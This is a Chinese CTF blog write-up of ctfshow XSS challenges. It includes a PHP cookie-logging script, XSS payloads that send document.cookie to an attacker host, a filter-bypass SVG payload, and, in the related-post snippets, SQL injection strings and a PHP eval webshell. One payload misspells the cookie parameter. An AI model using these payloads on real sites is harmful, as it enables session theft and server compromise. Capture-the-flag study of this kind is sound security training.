ctfshow xss(web316-333)更新中

发表于2025-08-30|更新于2025-08-30

|浏览量:

前言：

要做xss，最好是有一个自己的公网服务器，当然也可以选择内网穿透

这里我选择的是phpstudy+花生壳内网穿透

web316

首先打开页面，让我们输入内容

尝试输入

<script>alert('111');</script>

出现alert网页消息，说明存在xss漏洞

首先尝试查看cookie

<script>alert(document.cookie);</script>

结果显示：

PHPSESSID=2jmcsr1d43u48on5b969kqgdg3; flag=you%20are%20not%20admin%20no%20flag

说明我们需要获得cookie并注入，得到真正的flag

首先需要脚本

<?php
	$cookie = $_GET['cookie'];
	$time = date('Y-m-d h:i:s', time());
	$log = fopen("cookie.txt", "a");
	fwrite($log,$time.':    '. $cookie . "\n");
	fclose($log);
?>

这个脚本旨在获取网站中的其他用户cookie，这里就是admin，将其保存在cookie.txt中

我们的xss语句：

<script>location.href="ip/xss.php?coookie="+document.cookie</script>

这样就能在本地的cookie.txt中查看到admin的cookie和flag

web317-326

从317到326，就全是弹cookie，增加过滤

最后得到一个增强版语句

<svg/onload="location.href='xxx/1.php?cookie='-document.cookie"/>

web327

文章作者: REZE

文章链接: http://example.com/2025/08/30/CTFwp/ctfshow%20xss(316-333)/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 REZEのblog！

相关推荐

CTFHUB web前置技能

CTFHUB web前置技能 HTTP协议： 1.请求方式：翻译：HTTP Method 为 GET 使用 CTF**B 方法，我会给你标记。提示：如果你收到 “HTTP Method Not Allowed” 错误，你应该请求 index.php。使用bp拦截，将GET请求改为题目中的CTFHUB，再次发送，得到flag ctfhub{02778be697ad5008bfe9ae63} 302跳转：点击”give me flag“，发现无事发生，F12查看，发现状态302 用bp拦截到index.php文件的请求，发送到repeater，尝试再次发送，得到flag ctfhub{2fe8353641d31d1558f9daa9} 3.cookie 打开网页发现发现有： Cookie:...

ctfshow ssrf(web351-360)已完结

web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);echo ($result);?> 拿到题目，第一题没有进行任何过滤可以直接读取到flag url=127.0.0.1/flag.php web352-356一些过滤法一：进制转换 127.0.0.1=0x7F000001 法二：增减 http://127.0.1/...

CTFHUB web之sql注入（一）

这几天把sql注入最基础的一些给学了，用到了CTFHUB平台 1.整数型注入拿到题目，打开网址，我们往输入框里输入1，显示如下，接下来我们输入 1'-- -1a' --1" -- -1a" -- -1 -- -1a -- - 我们发现，输入第五条时，回显存在，接下来我们以第五条为基础，编写我们的注入语句我们查询的顺序依次是： DATABASE()——表名（table_name）——列名（column_name）——列中内容首先我们使用order by语句 1 order by xxx -- - 我们注意到，order by语句后为1和2时存在回显，3则无回显，我们得知，接下来的联合查询union select语句应该为 1 union select 1,2 -- - 输入后我们观察到成功出现回显，将1改为-1接着我们逐步搜查表名，列名库名： -1 union select 1,database() -- - 表名: -1 union select 1,table_name from...

ctfshow wp——信息搜集(web01-web20)已完结

ctfshow wp——信息搜集(web01-web20) web1web1:where is flag?开发注释未及时删除 F12查看源代码 <!DOCTYPE HTML><html><head><meta charset="utf-8"><title>CTFshow 新手入门题目 </title><script...

ctfshow 反序列化(web254-278)更新中

web254<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-02 17:44:47# @Last Modified by: h1xa# @Last Modified time: 2020-12-02 19:29:02# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public...

ctfshow 文件上传(web151-170)已完结

web151文件上传的第一题，只有一个绕过写马 <?= @eval($_POST['x']); ...